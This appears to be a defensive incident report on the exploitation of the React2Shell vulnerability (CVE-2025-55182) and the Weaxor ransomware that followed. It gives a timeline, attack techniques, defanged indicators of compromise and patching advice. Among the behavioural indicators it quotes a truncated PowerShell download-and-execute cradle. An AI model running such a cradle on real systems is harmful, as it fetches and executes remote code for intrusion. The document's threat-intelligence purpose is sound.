Full Report
Immediately after the threat actor gained access to our client’s network on 5 December 2025, they ran an obfuscated PowerShell command, which established command and control (C2) by downloading a Cobalt Strike PowerShell stager and installing a beacon that called back to their remote infrastructure. After this, the threat actor disabled real time protection on Windows Defender Antivirus to prepare the environment for secondary payloads. The ransomware binary was dropped and executed on the system within less than one minute of initial access. Recovery notes titled "RECOVERY INFORMATION.txt" were created in multiple directories. Encrypted files were modified with the file extension “.weax”. After ransomware detonation, a text file was also created on disk which included the public IP address of the target. This was likely sent back to the threat actor’s C2 server. As a defence evasion tactic, event logs were cleared, and volume shadow copies were deleted.
Analysis Summary
# Incident Report: React2Shell Exploitation Leading to Weaxor Ransomware Deployment
## Executive Summary
A financially motivated threat actor exploited the critical React2Shell vulnerability (CVE-2025-55182) to gain immediate access to a corporate network on December 5, 2025. The attacker rapidly deployed Weaxor ransomware within a minute of access, encrypting files on the initially compromised server. While defense evasion tactics were employed (log clearing, shadow copy deletion), the attack scope remained limited to the vulnerable web server; no lateral movement or data exfiltration was observed.
## Incident Details
- **Discovery Date:** Not specified, but the report was published on 16 December 2025.
- **Incident Date:** 5 December 2025 (Initial Access).
- **Affected Organization:** Client utilizing a system vulnerable to React2Shell.
- **Sector:** Not specified (Inferred: Organization using public-facing web applications powered by React/Next.js).
- **Geography:** Not specified.
## Timeline of Events
### Initial Access
- **Date/Time:** 5 December 2025 (Immediately after this date).
- **Vector:** Exploitation of the **React2Shell vulnerability (CVE-2025-55182)** via a malicious HTTP request targeting React Server Components (RSC)/Flight Protocol.
- **Details:** Threat actor established initial foothold with remote code execution on the web server.
### Command and Control Establishment & Payload Staging
- **Date/Time:** Within seconds of initial access.
- **Vector:** Obfuscated PowerShell command execution.
- **Details:**
1. Downloaded and executed a **Cobalt Strike PowerShell stager**.
2. Installed a **Cobalt Strike beacon** communicating with remote C2 infrastructure.
3. Disabled **real-time protection on Windows Defender Antivirus**.
4. Ran the `whoami` command for discovery (evidence likely obscured by log clearing).
### Ransomware Deployment & Impact
- **Date/Time:** Less than one minute after initial access.
- **Vector:** Execution of secondary payload.
- **Details:**
1. **Weaxor ransomware binary (ZQyfcAJ.exe)** was dropped and executed.
2. Files were encrypted and renamed with the extension **“.weax”**.
3. **"RECOVERY INFORMATION.txt"** notes were created in multiple directories.
4. A text file containing the **target's public IP address** was created and likely sent back to the attacker C2.
### Defense Evasion & Clean-up
- **Date/Time:** Concurrent with or immediately after ransomware detonation.
- **Vector:** System modification.
- **Details:**
1. **Event logs were cleared.**
2. **Volume shadow copies were deleted.**
### Lateral Movement
- **Status:** **None observed.** The scope of compromise was limited to the single vulnerable web server.
### Data Exfiltration/Impact
- **Status:** **No evidence of data exfiltration attempted.**
- **Impact:** Operational impact confined to denial of service on the affected server due to file encryption.
### Detection & Response
- **Discovery:** Details not provided, but an investigation team (S-RM) responded post-incident.
- **Response actions taken:** The scope of the response actions taken is not detailed in the provided text, other than identifying the IOCs and nature of the attack.
## Attack Methodology
| Category | Technique Used |
| :--- | :--- |
| **Initial Access** | Exploitation of **React2Shell (CVE-2025-55182)**. |
| **Persistence** | Installation of a **Cobalt Strike beacon**. |
| **Privilege Escalation** | Code executed with the privileges of the user running the web server, potentially resulting in **highly privileged access** (implied). |
| **Defense Evasion** | Disabled **Windows Defender Real-Time Protection**; **Cleared Event Logs**; **Deleted Volume Shadow Copies**. |
| **Credential Access** | Not explicitly mentioned/observed prior to ransomware execution. |
| **Discovery** | Execution of the **`whoami`** command. |
| **Lateral Movement** | None observed. |
| **Collection** | Not explicitly mentioned/observed. |
| **Exfiltration** | None observed. |
| **Impact** | Deployment and execution of **Weaxor ransomware** (Mallox strain). |
## Impact Assessment
- **Financial:** Not specified, potentially involving remediation costs and downtime for the affected server.
- **Data Breach:** No evidence suggests data was exfiltrated.
- **Operational:** Service disruption limited to the single vulnerable web server due to encryption.
- **Reputational:** Not specified.
## Indicators of Compromise
- **Network-based IOCs:**
- C2 IP Address: `23.235.188[.]3`
- Ransomware Connection IP: `193.143.1[.]153` (Port 80)
- Other Cobalt Strike/Payload IPs: `45.221.113[.]96`, `45.221.114[.]250`, `43.156.70[.]172`, `45.194.22[.]139`, `38.47.103[.]117`
- **File-based IOCs:**
- Ransomware Binary: `ZQyfcAJ.exe` (SHA1: `f6083acf5fde12d17fb5b3098242e92a48cbf122`)
- C2 Payload: `Agtisx.exe` (SHA1: `05f4407eb2e413c3babdc3054e6db032cadc51b2`)
- Ransom Note: `RECOVERY INFORMATION.txt`
- Evidence File: `weax.txt` (containing public IP)
- **Behavioral IOCs:**
- Deobfuscated PowerShell command using `IEX (New-Object System[.]Net[.]Webclient).DownloadString(...)`.
- Presence of processes related to Node or React execution originating from web server context making system calls.
- User Access Logs recording a 'File Server' connection from `127.0.0.1` associated with the vulnerable process user account near the time of access.
## Response Actions
- **Containment Measures:** (Implied) Isolation of the compromised web server.
- **Eradication Steps:** (Implied) Removal of Cobalt Strike beacon, C2 activity, and the Weaxor binary.
- **Recovery Actions:** (Implied) Restoration of encrypted files from backups (as no mention of failure to recover was made).
## Lessons Learned
- The React2Shell vulnerability enabled extremely rapid deployment of ransomware, moving from initial access to encryption in under one minute, indicating potential full automation.
- Financially motivated groups are now actively targeting newly disclosed critical vulnerabilities (like CVE-2025-55182), shifting focus beyond nation-state actors or crypto miners.
- Log clearing and shadow copy deletion are standard components of the toolkit used by Weaxor operators to hinder forensic investigation.
## Recommendations
1. **Immediate Patching:** Prioritize patching all systems vulnerable to CVE-2025-55182 (React Server Components/Next.js).
2. **Monitor Web Server Process Execution:** Implement strict monitoring for anomalous process creation (especially PowerShell execution) originating from web application runtime environments (Node/React processes).
3. **Enhance EDR/AV Coverage:** Ensure real-time protection mechanisms are resilient against targeted disabling attempts prior to payload deployment.
4. **Review Backup Integrity:** Verify the recoverability and offline status of backups, especially given the immediate deletion of volume shadow copies.